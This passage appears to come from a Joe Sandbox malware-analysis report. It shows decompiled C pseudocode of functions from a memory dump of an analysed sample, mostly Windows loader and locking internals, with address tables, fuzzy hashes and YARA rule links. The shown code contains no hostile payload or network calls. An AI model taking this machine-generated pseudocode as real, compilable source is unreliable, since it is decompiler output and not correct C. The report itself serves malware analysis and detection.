					_t101 = _t31;
					 *_t101 = _t88;
					_t101[1] = _t97;
					goto L15;
				}
			}









































                                                    0x017ddbe9
                                                    0x017ddbf2
                                                    0x017ddbf7
                                                    0x017ddbf9
                                                    0x017ddbfc
                                                    0x017ddc00
                                                    0x017ddc03
                                                    0x017ddc14
                                                    0x017ddd54
                                                    0x017ddd54
                                                    0x017ddd54
                                                    0x017ddc18
                                                    0x017ddc1d
                                                    0x017ddc1d
                                                    0x017ddc32
                                                    0x017ddc3b
                                                    0x017ddc3e
                                                    0x017ddc46
                                                    0x017ddd5b
                                                    0x017ddd62
                                                    0x017ddd64
                                                    0x017ddd67
                                                    0x017ddd69
                                                    0x017ddd6b
                                                    0x017ddd6e
                                                    0x017ddd70
                                                    0x017ddd73
                                                    0x017ddd73
                                                    0x00000000
                                                    0x017ddc4c
                                                    0x017ddc4e
                                                    0x01823ae3
                                                    0x01823ae8
                                                    0x01823aea
                                                    0x017ddce7
                                                    0x017ddce9
                                                    0x017ddcec
                                                    0x017ddcee
                                                    0x017ddcf0
                                                    0x017ddcf3
                                                    0x017ddcf5
                                                    0x01823af2
                                                    0x01823af5
                                                    0x01823af5
                                                    0x017ddd06
                                                    0x017ddd08
                                                    0x017ddd0b
                                                    0x017ddd12
                                                    0x01823b08
                                                    0x017ddd18
                                                    0x017ddd18
                                                    0x017ddd18
                                                    0x017ddd20
                                                    0x017ddd23
                                                    0x01823b16
                                                    0x01823b16
                                                    0x017ddd29
                                                    0x017ddd2d
                                                    0x017ddd36
                                                    0x017ddd40
                                                    0x017ddd51
                                                    0x017ddd51
                                                    0x017ddc54
                                                    0x017ddc59
                                                    0x017ddc59
                                                    0x017ddc5e
                                                    0x017ddc5e
                                                    0x017ddc63
                                                    0x017ddc66
                                                    0x017ddc6b
                                                    0x017ddc78
                                                    0x017ddc7b
                                                    0x017ddc81
                                                    0x017ddc81
                                                    0x017ddc83
                                                    0x017ddc89
                                                    0x00000000
                                                    0x00000000
                                                    0x017ddd7b
                                                    0x017ddd7b
                                                    0x017ddc8f
                                                    0x017ddc8f
                                                    0x017ddc92
                                                    0x017ddc99
                                                    0x017ddc9f
                                                    0x017ddca5
                                                    0x017ddcaa
                                                    0x017ddcaa
                                                    0x017ddcb3
                                                    0x017ddcb8
                                                    0x017ddcbb
                                                    0x017ddcc1
                                                    0x017ddccf
                                                    0x017ddcd2
                                                    0x017ddcd5
                                                    0x017ddcd7
                                                    0x017ddcda
                                                    0x017ddcdc
                                                    0x017ddcdc
                                                    0x017ddce2
                                                    0x017ddce4
                                                    0x00000000
                                                    0x017ddce4

                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.578840011.0000000001790000.00000040.00001000.00020000.00000000.sdmp, Offset: 01790000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_2_2_1790000_P5348574_74676.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: a06fb456ae12f3ff3374dc4046ca1fbfa2c5cc166d634a6ee22dfbb3383ad7f3
                                                    • Instruction ID: dd30c4894f962bfc2e3c02072519f5731b738d1e2dd75dbcadcbaa47249ee8c7
                                                    • Opcode Fuzzy Hash: a06fb456ae12f3ff3374dc4046ca1fbfa2c5cc166d634a6ee22dfbb3383ad7f3
                                                    • Instruction Fuzzy Hash: 32518171A00619DFCB25CFA8C4906ADFBF5BB49310F24815AD959A7385DB31A984CBA0
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 017CEF40 Relevance: .1, Instructions: 147COMMON
                                                    Download Yara Rule
                                                    C-Code - Quality: 96%
                                                    			E017CEF40(intOrPtr __ecx) {
				char _v5;
				char _v6;
				char _v7;
				char _v8;
				signed int _v12;
				intOrPtr _v16;
				intOrPtr _v20;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				intOrPtr _t58;
				char _t59;
				signed char _t69;
				void* _t73;
				signed int _t74;
				char _t79;
				signed char _t81;
				signed int _t85;
				signed int _t87;
				intOrPtr _t90;
				signed char* _t91;
				void* _t92;
				signed int _t94;
				void* _t96;

				_t90 = __ecx;
				_v16 = __ecx;
				if(( *(__ecx + 0x14) & 0x04000000) != 0) {
					_t58 =  *((intOrPtr*)(__ecx));
					if(_t58 != 0xffffffff &&  *((intOrPtr*)(_t58 + 8)) == 0) {
						E017B9080(_t73, __ecx, __ecx, _t92);
					}
				}
				_t74 = 0;
				_t96 =  *0x7ffe036a - 1;
				_v12 = 0;
				_v7 = 0;
				if(_t96 > 0) {
					_t74 =  *(_t90 + 0x14) & 0x00ffffff;
					_v12 = _t74;
					_v7 = _t96 != 0;
				}
				_t79 = 0;
				_v8 = 0;
				_v5 = 0;
				while(1) {
					L4:
					_t59 = 1;
					L5:
					while(1) {
						if(_t59 == 0) {
							L12:
							_t21 = _t90 + 4; // 0x77d0c21e
							_t87 =  *_t21;
							_v6 = 0;
							if(_t79 != 0) {
								if((_t87 & 0x00000002) != 0) {
									goto L19;
								}
								if((_t87 & 0x00000001) != 0) {
									_v6 = 1;
									_t74 = _t87 ^ 0x00000003;
								} else {
									_t51 = _t87 - 2; // -2
									_t74 = _t51;
								}
								goto L15;
							} else {
								if((_t87 & 0x00000001) != 0) {
									_v6 = 1;
									_t74 = _t87 ^ 0x00000001;
								} else {
									_t26 = _t87 - 4; // -4
									_t74 = _t26;
									if((_t74 & 0x00000002) == 0) {
										_t74 = _t74 - 2;
									}
								}
								L15:
								if(_t74 == _t87) {
									L19:
									E017B2D8A(_t74, _t90, _t87, _t90);
									_t74 = _v12;
									_v8 = 1;
									if(_v7 != 0 && _t74 > 0x64) {
										_t74 = _t74 - 1;
										_v12 = _t74;
									}
									_t79 = _v5;
									goto L4;
								}
								asm("lock cmpxchg [esi], ecx");
								if(_t87 != _t87) {
									_t74 = _v12;
									_t59 = 0;
									_t79 = _v5;
									continue;
								}
								if(_v6 != 0) {
									_t74 = _v12;
									L25:
									if(_v7 != 0) {
										if(_t74 < 0x7d0) {
											if(_v8 == 0) {
												_t74 = _t74 + 1;
											}
										}
										_t38 = _t90 + 0x14; // 0x0
										_t39 = _t90 + 0x14; // 0x0
										_t85 = ( *_t38 ^ _t74) & 0x00ffffff ^  *_t39;
										if( *((intOrPtr*)( *[fs:0x30] + 0x64)) == 1) {
											_t85 = _t85 & 0xff000000;
										}
										 *(_t90 + 0x14) = _t85;
									}
									 *((intOrPtr*)(_t90 + 0xc)) =  *((intOrPtr*)( *[fs:0x18] + 0x24));
									 *((intOrPtr*)(_t90 + 8)) = 1;
									return 0;
								}
								_v5 = 1;
								_t87 = _t74;
								goto L19;
							}
						}
						_t94 = _t74;
						_v20 = 1 + (0 | _t79 != 0x00000000) * 2;
						if(_t74 == 0) {
							goto L12;
						} else {
							_t91 = _t90 + 4;
							goto L8;
							L9:
							while((_t81 & 0x00000001) != 0) {
								_t69 = _t81;
								asm("lock cmpxchg [edi], edx");
								if(_t69 != _t81) {
									_t81 = _t69;
									continue;
								}
								_t90 = _v16;
								goto L25;
							}
							asm("pause");
							_t94 = _t94 - 1;
							if(_t94 != 0) {
								L8:
								_t81 =  *_t91;
								goto L9;
							} else {
								_t90 = _v16;
								_t79 = _v5;
								goto L12;
							}
						}
					}
				}
			}




























                                                    0x017cef4b
                                                    0x017cef4d
                                                    0x017cef57
                                                    0x017cf0bd
                                                    0x017cf0c2
                                                    0x017cf0d2
                                                    0x017cf0d2
                                                    0x017cf0c2
                                                    0x017cef5d
                                                    0x017cef5f
                                                    0x017cef67
                                                    0x017cef6a
                                                    0x017cef6d
                                                    0x017cef74
                                                    0x017cef7f
                                                    0x017cef82
                                                    0x017cef82
                                                    0x017cef86
                                                    0x017cef88
                                                    0x017cef8c
                                                    0x017cef8f
                                                    0x017cef8f
                                                    0x017cef8f
                                                    0x00000000
                                                    0x017cef91
                                                    0x017cef93
                                                    0x017cefc4
                                                    0x017cefc4
                                                    0x017cefc4
                                                    0x017cefca
                                                    0x017cefd0
                                                    0x017cf0a6
                                                    0x00000000
                                                    0x00000000
                                                    0x017cf0af
                                                    0x0181bb06
                                                    0x0181bb0a
                                                    0x017cf0b5
                                                    0x017cf0b5
                                                    0x017cf0b5
                                                    0x017cf0b5
                                                    0x00000000
                                                    0x017cefd6
                                                    0x017cefd9
                                                    0x017cf0de
                                                    0x017cf0e2
                                                    0x017cefdf
                                                    0x017cefdf
                                                    0x017cefdf
                                                    0x017cefe5
                                                    0x0181bafc
                                                    0x0181bafc
                                                    0x017cefe5
                                                    0x017cefeb
                                                    0x017cefed
                                                    0x017cf00f
                                                    0x017cf011
                                                    0x017cf01a
                                                    0x017cf01d
                                                    0x017cf021
                                                    0x017cf028
                                                    0x017cf029
                                                    0x017cf029
                                                    0x017cf02c
                                                    0x00000000
                                                    0x017cf02c
                                                    0x017ceff3
                                                    0x017ceff9
                                                    0x017cf0ea
                                                    0x017cf0ed
                                                    0x017cf0ef
                                                    0x00000000
                                                    0x017cf0ef
                                                    0x017cf003
                                                    0x0181bb12
                                                    0x017cf045
                                                    0x017cf049
                                                    0x017cf051
                                                    0x017cf09e
                                                    0x017cf0a0
                                                    0x017cf0a0
                                                    0x017cf09e
                                                    0x017cf053
                                                    0x017cf064
                                                    0x017cf064
                                                    0x017cf06b
                                                    0x0181bb1a
                                                    0x0181bb1a
                                                    0x017cf071
                                                    0x017cf071
                                                    0x017cf07d
                                                    0x017cf082
                                                    0x017cf08f
                                                    0x017cf08f
                                                    0x017cf009
                                                    0x017cf00d
                                                    0x00000000
                                                    0x017cf00d
                                                    0x017cefd0
                                                    0x017cef97
                                                    0x017cefa5
                                                    0x017cefaa
                                                    0x00000000
                                                    0x017cefac
                                                    0x017cefac
                                                    0x017cefac
                                                    0x00000000
                                                    0x017cefb2
                                                    0x017cf036
                                                    0x017cf03a
                                                    0x017cf040
                                                    0x017cf090
                                                    0x00000000
                                                    0x017cf092
                                                    0x017cf042
                                                    0x00000000
                                                    0x017cf042
                                                    0x017cefb7
                                                    0x017cefb9
                                                    0x017cefbc
                                                    0x017cefb0
                                                    0x017cefb0
                                                    0x00000000
                                                    0x017cefbe
                                                    0x017cefbe
                                                    0x017cefc1
                                                    0x00000000
                                                    0x017cefc1
                                                    0x017cefbc
                                                    0x017cefaa
                                                    0x017cef91

                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.578840011.0000000001790000.00000040.00001000.00020000.00000000.sdmp, Offset: 01790000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_2_2_1790000_P5348574_74676.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: fbecc144452e6e9740e37df579310400ca1de53fcc592e2907188de4c37816b0
                                                    • Instruction ID: 89ef144f4343c2e79a5697851a7d4394c9976e14b8510c66f2d39b2d22420a7b
                                                    • Opcode Fuzzy Hash: fbecc144452e6e9740e37df579310400ca1de53fcc592e2907188de4c37816b0
                                                    • Instruction Fuzzy Hash: 8E510231A0424ADFEB25CB68C1C47AEFFB2AF05B14F1881ACC54597282C775AAC9C751
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 0188740D Relevance: .1, Instructions: 141COMMON
                                                    Download Yara Rule
                                                    C-Code - Quality: 84%
                                                    			E0188740D(intOrPtr __ecx, signed short* __edx, intOrPtr _a4) {
				signed short* _v8;
				intOrPtr _v12;
				intOrPtr _t55;
				void* _t56;
				intOrPtr* _t66;
				intOrPtr* _t69;
				void* _t74;
				intOrPtr* _t78;
				intOrPtr* _t81;
				intOrPtr* _t82;
				intOrPtr _t83;
				signed short* _t84;
				intOrPtr _t85;
				signed int _t87;
				intOrPtr* _t90;
				intOrPtr* _t93;
				intOrPtr* _t94;
				void* _t98;

				_t84 = __edx;
				_t80 = __ecx;
				_push(__ecx);
				_push(__ecx);
				_t55 = __ecx;
				_v8 = __edx;
				_t87 =  *__edx & 0x0000ffff;
				_v12 = __ecx;
				_t3 = _t55 + 0x154; // 0x154
				_t93 = _t3;
				_t78 =  *_t93;
				_t4 = _t87 + 2; // 0x2
				_t56 = _t4;
				while(_t78 != _t93) {
					if( *((intOrPtr*)(_t78 + 0x14)) != _t56) {
						L4:
						_t78 =  *_t78;
						continue;
					} else {
						_t7 = _t78 + 0x18; // 0x18
						if(E0180D4F0(_t7, _t84[2], _t87) == _t87) {
							_t40 = _t78 + 0xc; // 0xc
							_t94 = _t40;
							_t90 =  *_t94;
							while(_t90 != _t94) {
								_t41 = _t90 + 8; // 0x8
								_t74 = E017FF380(_a4, _t41, 0x10);
								_t98 = _t98 + 0xc;
								if(_t74 != 0) {
									_t90 =  *_t90;
									continue;
								}
								goto L12;
							}
							_t82 = L017D4620(_t80,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, 0x18);
							if(_t82 != 0) {
								_t46 = _t78 + 0xc; // 0xc
								_t69 = _t46;
								asm("movsd");
								asm("movsd");
								asm("movsd");
								asm("movsd");
								_t85 =  *_t69;
								if( *((intOrPtr*)(_t85 + 4)) != _t69) {
									L20:
									_t82 = 3;
									asm("int 0x29");
								}
								 *((intOrPtr*)(_t82 + 4)) = _t69;
								 *_t82 = _t85;
								 *((intOrPtr*)(_t85 + 4)) = _t82;
								 *_t69 = _t82;
								 *(_t78 + 8) =  *(_t78 + 8) + 1;
								 *(_v12 + 0xdc) =  *(_v12 + 0xdc) | 0x00000010;
								goto L11;
							} else {
								L18:
								_push(0xe);
								_pop(0);
							}
						} else {
							_t84 = _v8;
							_t9 = _t87 + 2; // 0x2
							_t56 = _t9;
							goto L4;
						}
					}
					L12:
					return 0;
				}
				_t10 = _t87 + 0x1a; // 0x1a
				_t78 = L017D4620(_t80,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _t10);
				if(_t78 == 0) {
					goto L18;
				} else {
					_t12 = _t87 + 2; // 0x2
					 *((intOrPtr*)(_t78 + 0x14)) = _t12;
					_t16 = _t78 + 0x18; // 0x18
					E017FF3E0(_t16, _v8[2], _t87);
					 *((short*)(_t78 + _t87 + 0x18)) = 0;
					_t19 = _t78 + 0xc; // 0xc
					_t66 = _t19;
					 *((intOrPtr*)(_t66 + 4)) = _t66;
					 *_t66 = _t66;
					 *(_t78 + 8) =  *(_t78 + 8) & 0x00000000;
					_t81 = L017D4620(_t80,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, 0x18);
					if(_t81 == 0) {
						goto L18;
					} else {
						_t26 = _t78 + 0xc; // 0xc
						_t69 = _t26;
						asm("movsd");
						asm("movsd");
						asm("movsd");
						asm("movsd");
						_t85 =  *_t69;
						if( *((intOrPtr*)(_t85 + 4)) != _t69) {
							goto L20;
						} else {
							 *((intOrPtr*)(_t81 + 4)) = _t69;
							 *_t81 = _t85;
							 *((intOrPtr*)(_t85 + 4)) = _t81;
							 *_t69 = _t81;
							_t83 = _v12;
							 *(_t78 + 8) = 1;
							 *(_t83 + 0xdc) =  *(_t83 + 0xdc) | 0x00000010;
							_t34 = _t83 + 0x154; // 0x1ba
							_t69 = _t34;
							_t85 =  *_t69;
							if( *((intOrPtr*)(_t85 + 4)) != _t69) {
								goto L20;
							} else {
								 *_t78 = _t85;
								 *((intOrPtr*)(_t78 + 4)) = _t69;
								 *((intOrPtr*)(_t85 + 4)) = _t78;
								 *_t69 = _t78;
								 *(_t83 + 0xdc) =  *(_t83 + 0xdc) | 0x00000010;
							}
						}
						goto L11;
					}
				}
				goto L12;
			}





















                                                    0x0188740d
                                                    0x0188740d
                                                    0x01887412
                                                    0x01887413
                                                    0x01887416
                                                    0x01887418
                                                    0x0188741c
                                                    0x0188741f
                                                    0x01887422
                                                    0x01887422
                                                    0x01887428
                                                    0x0188742a
                                                    0x0188742a
                                                    0x01887451
                                                    0x01887432
                                                    0x0188744f
                                                    0x0188744f
                                                    0x00000000
                                                    0x01887434
                                                    0x01887438
                                                    0x01887443
                                                    0x01887517
                                                    0x01887517
                                                    0x0188751a
                                                    0x01887535
                                                    0x01887520
                                                    0x01887527
                                                    0x0188752c
                                                    0x01887531
                                                    0x01887533
                                                    0x00000000
                                                    0x01887533
                                                    0x00000000
                                                    0x01887531
                                                    0x0188754b
                                                    0x0188754f
                                                    0x0188755c
                                                    0x0188755c
                                                    0x0188755f
                                                    0x01887560
                                                    0x01887561
                                                    0x01887562
                                                    0x01887563
                                                    0x01887568
                                                    0x0188756a
                                                    0x0188756c
                                                    0x0188756d
                                                    0x0188756d
                                                    0x0188756f
                                                    0x01887572
                                                    0x01887574
                                                    0x01887577
                                                    0x0188757c
                                                    0x0188757f
                                                    0x00000000
                                                    0x01887551
                                                    0x01887551
                                                    0x01887551
                                                    0x01887553
                                                    0x01887553
                                                    0x01887449
                                                    0x01887449
                                                    0x0188744c
                                                    0x0188744c
                                                    0x00000000
                                                    0x0188744c
                                                    0x01887443
                                                    0x0188750e
                                                    0x01887514
                                                    0x01887514
                                                    0x01887455
                                                    0x01887469
                                                    0x0188746d
                                                    0x00000000
                                                    0x01887473
                                                    0x01887473
                                                    0x01887476
                                                    0x01887480
                                                    0x01887484
                                                    0x0188748e
                                                    0x01887493
                                                    0x01887493
                                                    0x01887496
                                                    0x01887499
                                                    0x018874a1
                                                    0x018874b1
                                                    0x018874b5
                                                    0x00000000
                                                    0x018874bb
                                                    0x018874c1
                                                    0x018874c1
                                                    0x018874c4
                                                    0x018874c5
                                                    0x018874c6
                                                    0x018874c7
                                                    0x018874c8
                                                    0x018874cd
                                                    0x00000000
                                                    0x018874d3
                                                    0x018874d3
                                                    0x018874d6
                                                    0x018874d8
                                                    0x018874db
                                                    0x018874dd
                                                    0x018874e0
                                                    0x018874e7
                                                    0x018874ee
                                                    0x018874ee
                                                    0x018874f4
                                                    0x018874f9
                                                    0x00000000
                                                    0x018874fb
                                                    0x018874fb
                                                    0x018874fd
                                                    0x01887500
                                                    0x01887503
                                                    0x01887505
                                                    0x01887505
                                                    0x018874f9
                                                    0x00000000
                                                    0x018874cd
                                                    0x018874b5
                                                    0x00000000

                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.578840011.0000000001790000.00000040.00001000.00020000.00000000.sdmp, Offset: 01790000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_2_2_1790000_P5348574_74676.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 01a4d08349e29d22493120a27b3d49beb444160764ac4f0ac8d9a4757e3060ec
                                                    • Instruction ID: fd1d3e7c536fac1074e174d2fc5028b68da39c1ceacabd6ecb00efdd9ad7b75d
                                                    • Opcode Fuzzy Hash: 01a4d08349e29d22493120a27b3d49beb444160764ac4f0ac8d9a4757e3060ec
                                                    • Instruction Fuzzy Hash: E251AE71600646EFDB16DF18C480A96FBB5FF45304F24C0AAE908DF216E371EA46CBA0
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 017E2990 Relevance: .1, Instructions: 133COMMON
                                                    Download Yara Rule
                                                    C-Code - Quality: 97%
                                                    			E017E2990() {
				signed int* _t62;
				signed int _t64;
				intOrPtr _t66;
				signed short* _t69;
				intOrPtr _t76;
				signed short* _t79;
				void* _t81;
				signed int _t82;
				signed short* _t83;
				signed int _t87;
				intOrPtr _t91;
				void* _t98;
				signed int _t99;
				void* _t101;
				signed int* _t102;
				void* _t103;
				void* _t104;
				void* _t107;

				_push(0x20);
				_push(0x188ff00);
				E0180D08C(_t81, _t98, _t101);
				 *((intOrPtr*)(_t103 - 0x28)) =  *[fs:0x18];
				_t99 = 0;
				 *((intOrPtr*)( *((intOrPtr*)(_t103 + 0x1c)))) = 0;
				_t82 =  *((intOrPtr*)(_t103 + 0x10));
				if(_t82 == 0) {
					_t62 = 0xc0000100;
				} else {
					 *((intOrPtr*)(_t103 - 4)) = 0;
					_t102 = 0xc0000100;
					 *((intOrPtr*)(_t103 - 0x30)) = 0xc0000100;
					_t64 = 4;
					while(1) {
						 *(_t103 - 0x24) = _t64;
						if(_t64 == 0) {
							break;
						}
						_t87 = _t64 * 0xc;
						 *(_t103 - 0x2c) = _t87;
						_t107 = _t82 -  *((intOrPtr*)(_t87 + 0x1791664));
						if(_t107 <= 0) {
							if(_t107 == 0) {
								_t79 = E017FE5C0( *((intOrPtr*)(_t103 + 0xc)),  *((intOrPtr*)(_t87 + 0x1791668)), _t82);
								_t104 = _t104 + 0xc;
								__eflags = _t79;
								if(__eflags == 0) {
									_t102 = E018351BE(_t82,  *((intOrPtr*)( *(_t103 - 0x2c) + 0x179166c)),  *((intOrPtr*)(_t103 + 0x14)), _t99, _t102, __eflags,  *((intOrPtr*)(_t103 + 0x18)),  *((intOrPtr*)(_t103 + 0x1c)));
									 *((intOrPtr*)(_t103 - 0x30)) = _t102;
									break;
								} else {
									_t64 =  *(_t103 - 0x24);
									goto L5;
								}
								goto L13;
							} else {
								L5:
								_t64 = _t64 - 1;
								continue;
							}
						}
						break;
					}
					 *((intOrPtr*)(_t103 - 0x1c)) = _t102;
					__eflags = _t102;
					if(_t102 < 0) {
						__eflags = _t102 - 0xc0000100;
						if(_t102 == 0xc0000100) {
							_t83 =  *((intOrPtr*)(_t103 + 8));
							__eflags = _t83;
							if(_t83 != 0) {
								 *((intOrPtr*)(_t103 - 0x20)) = _t83;
								__eflags =  *_t83 - _t99;
								if( *_t83 == _t99) {
									_t102 = 0xc0000100;
									goto L19;
								} else {
									_t91 =  *((intOrPtr*)( *((intOrPtr*)(_t103 - 0x28)) + 0x30));
									_t66 =  *((intOrPtr*)(_t91 + 0x10));
									__eflags =  *((intOrPtr*)(_t66 + 0x48)) - _t83;
									if( *((intOrPtr*)(_t66 + 0x48)) == _t83) {
										__eflags =  *((intOrPtr*)(_t91 + 0x1c));
										if( *((intOrPtr*)(_t91 + 0x1c)) == 0) {
											L26:
											_t102 = E017E2AE4(_t103 - 0x20,  *((intOrPtr*)(_t103 + 0xc)), _t82,  *((intOrPtr*)(_t103 + 0x14)),  *((intOrPtr*)(_t103 + 0x18)),  *((intOrPtr*)(_t103 + 0x1c)));
											 *((intOrPtr*)(_t103 - 0x1c)) = _t102;
											__eflags = _t102 - 0xc0000100;
											if(_t102 != 0xc0000100) {
												goto L12;
											} else {
												_t99 = 1;
												_t83 =  *((intOrPtr*)(_t103 - 0x20));
												goto L18;
											}
										} else {
											_t69 = E017C6600( *((intOrPtr*)(_t91 + 0x1c)));
											__eflags = _t69;
											if(_t69 != 0) {
												goto L26;
											} else {
												_t83 =  *((intOrPtr*)(_t103 + 8));
												goto L18;
											}
										}
									} else {
										L18:
										_t102 = E017E2C50(_t83,  *((intOrPtr*)(_t103 + 0xc)), _t82,  *((intOrPtr*)(_t103 + 0x14)),  *((intOrPtr*)(_t103 + 0x18)),  *((intOrPtr*)(_t103 + 0x1c)), _t99);
										L19:
										 *((intOrPtr*)(_t103 - 0x1c)) = _t102;
										goto L12;
									}
								}
								L28:
							} else {
								E017CEEF0( *((intOrPtr*)( *[fs:0x30] + 0x1c)));
								 *((intOrPtr*)(_t103 - 4)) = 1;
								 *((intOrPtr*)(_t103 - 0x20)) =  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t103 - 0x28)) + 0x30)) + 0x10)) + 0x48));
								_t102 =  *((intOrPtr*)(_t103 + 0x1c));
								_t76 = E017E2AE4(_t103 - 0x20,  *((intOrPtr*)(_t103 + 0xc)), _t82,  *((intOrPtr*)(_t103 + 0x14)),  *((intOrPtr*)(_t103 + 0x18)), _t102);
								 *((intOrPtr*)(_t103 - 0x1c)) = _t76;
								__eflags = _t76 - 0xc0000100;
								if(_t76 == 0xc0000100) {
									 *((intOrPtr*)(_t103 - 0x1c)) = E017E2C50( *((intOrPtr*)(_t103 - 0x20)),  *((intOrPtr*)(_t103 + 0xc)), _t82,  *((intOrPtr*)(_t103 + 0x14)),  *((intOrPtr*)(_t103 + 0x18)), _t102, 1);
								}
								 *((intOrPtr*)(_t103 - 4)) = _t99;
								E017E2ACB();
							}
						}
					}
					L12:
					 *((intOrPtr*)(_t103 - 4)) = 0xfffffffe;
					_t62 = _t102;
				}
				L13:
				return E0180D0D1(_t62);
				goto L28;
			}





















                                                    0x017e2990
                                                    0x017e2992
                                                    0x017e2997
                                                    0x017e29a3
                                                    0x017e29a6
                                                    0x017e29ab
                                                    0x017e29ad
                                                    0x017e29b2
                                                    0x01825c80
                                                    0x017e29b8
                                                    0x017e29b8
                                                    0x017e29bb
                                                    0x017e29c0
                                                    0x017e29c5
                                                    0x017e29c6
                                                    0x017e29c6
                                                    0x017e29cb
                                                    0x00000000
                                                    0x00000000
                                                    0x017e29cd
                                                    0x017e29d0
                                                    0x017e29d9
                                                    0x017e29db
                                                    0x017e29dd
                                                    0x017e2a7f
                                                    0x017e2a84
                                                    0x017e2a87
                                                    0x017e2a89
                                                    0x01825ca1
                                                    0x01825ca3
                                                    0x00000000
                                                    0x017e2a8f
                                                    0x017e2a8f
                                                    0x00000000
                                                    0x017e2a8f
                                                    0x00000000
                                                    0x017e29e3
                                                    0x017e29e3
                                                    0x017e29e3
                                                    0x00000000
                                                    0x017e29e3
                                                    0x017e29dd
                                                    0x00000000
                                                    0x017e29db
                                                    0x017e29e6
                                                    0x017e29e9
                                                    0x017e29eb
                                                    0x017e29ed
                                                    0x017e29f3
                                                    0x017e29f5
                                                    0x017e29f8
                                                    0x017e29fa
                                                    0x017e2a97
                                                    0x017e2a9a
                                                    0x017e2a9d
                                                    0x017e2add
                                                    0x00000000
                                                    0x017e2a9f
                                                    0x017e2aa2
                                                    0x017e2aa5
                                                    0x017e2aa8
                                                    0x017e2aab
                                                    0x01825cab
                                                    0x01825caf
                                                    0x01825cc5
                                                    0x01825cda
                                                    0x01825cdc
                                                    0x01825cdf
                                                    0x01825ce5
                                                    0x00000000
                                                    0x01825ceb
                                                    0x01825ced
                                                    0x01825cee
                                                    0x00000000
                                                    0x01825cee
                                                    0x01825cb1
                                                    0x01825cb4
                                                    0x01825cb9
                                                    0x01825cbb
                                                    0x00000000
                                                    0x01825cbd
                                                    0x01825cbd
                                                    0x00000000
                                                    0x01825cbd
                                                    0x01825cbb
                                                    0x017e2ab1
                                                    0x017e2ab1
                                                    0x017e2ac4
                                                    0x017e2ac6
                                                    0x017e2ac6
                                                    0x00000000
                                                    0x017e2ac6
                                                    0x017e2aab
                                                    0x00000000
                                                    0x017e2a00
                                                    0x017e2a09
                                                    0x017e2a0e
                                                    0x017e2a21
                                                    0x017e2a24
                                                    0x017e2a35
                                                    0x017e2a3a
                                                    0x017e2a3d
                                                    0x017e2a42
                                                    0x017e2a59
                                                    0x017e2a59
                                                    0x017e2a5c
                                                    0x017e2a5f
                                                    0x017e2a5f
                                                    0x017e29fa
                                                    0x017e29f3
                                                    0x017e2a64
                                                    0x017e2a64
                                                    0x017e2a6b
                                                    0x017e2a6b
                                                    0x017e2a6d
                                                    0x017e2a72
                                                    0x00000000

                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.578840011.0000000001790000.00000040.00001000.00020000.00000000.sdmp, Offset: 01790000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_2_2_1790000_P5348574_74676.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 190526338cb36bcfbe4b6121761225e174d90942ba1f82a5665db45621333d13
                                                    • Instruction ID: 21e03da3a8796aa1c38ec4d9f495354fe9b5c1e4d1e2011db792020e672dda68
                                                    • Opcode Fuzzy Hash: 190526338cb36bcfbe4b6121761225e174d90942ba1f82a5665db45621333d13
                                                    • Instruction Fuzzy Hash: 50516A3190021A9FDF26DF58C888ADEBBF9BF4C350F148159E904AB261D7358A92CB90
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 017E4BAD Relevance: .1, Instructions: 131COMMON
                                                    Download Yara Rule
                                                    C-Code - Quality: 85%
                                                    			E017E4BAD(intOrPtr __ecx, short __edx, signed char _a4, signed short _a8) {
				signed int _v8;
				short _v20;
				intOrPtr _v24;
				intOrPtr _v28;
				intOrPtr _v32;
				char _v36;
				char _v156;
				short _v158;
				intOrPtr _v160;
				char _v164;
				intOrPtr _v168;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t45;
				intOrPtr _t74;
				signed char _t77;
				intOrPtr _t84;
				char* _t85;
				void* _t86;
				intOrPtr _t87;
				signed short _t88;
				signed int _t89;

				_t83 = __edx;
				_v8 =  *0x18ad360 ^ _t89;
				_t45 = _a8 & 0x0000ffff;
				_v158 = __edx;
				_v168 = __ecx;
				if(_t45 == 0) {
					L22:
					_t86 = 6;
					L12:
					E017BCC50(_t86);
					L11:
					return E017FB640(_t86, _t77, _v8 ^ _t89, _t83, _t84, _t86);
				}
				_t77 = _a4;
				if((_t77 & 0x00000001) != 0) {
					goto L22;
				}
				_t8 = _t77 + 0x34; // 0xdce0ba00
				if(_t45 !=  *_t8) {
					goto L22;
				}
				_t9 = _t77 + 0x24; // 0x18a8504
				E017D2280(_t9, _t9);
				_t87 = 0x78;
				 *(_t77 + 0x2c) =  *( *[fs:0x18] + 0x24);
				E017FFA60( &_v156, 0, _t87);
				_t13 = _t77 + 0x30; // 0x3db8
				_t85 =  &_v156;
				_v36 =  *_t13;
				_v28 = _v168;
				_v32 = 0;
				_v24 = 0;
				_v20 = _v158;
				_v160 = 0;
				while(1) {
					_push( &_v164);
					_push(_t87);
					_push(_t85);
					_push(0x18);
					_push( &_v36);
					_push(0x1e);
					_t88 = E017FB0B0();
					if(_t88 != 0xc0000023) {
						break;
					}
					if(_t85 !=  &_v156) {
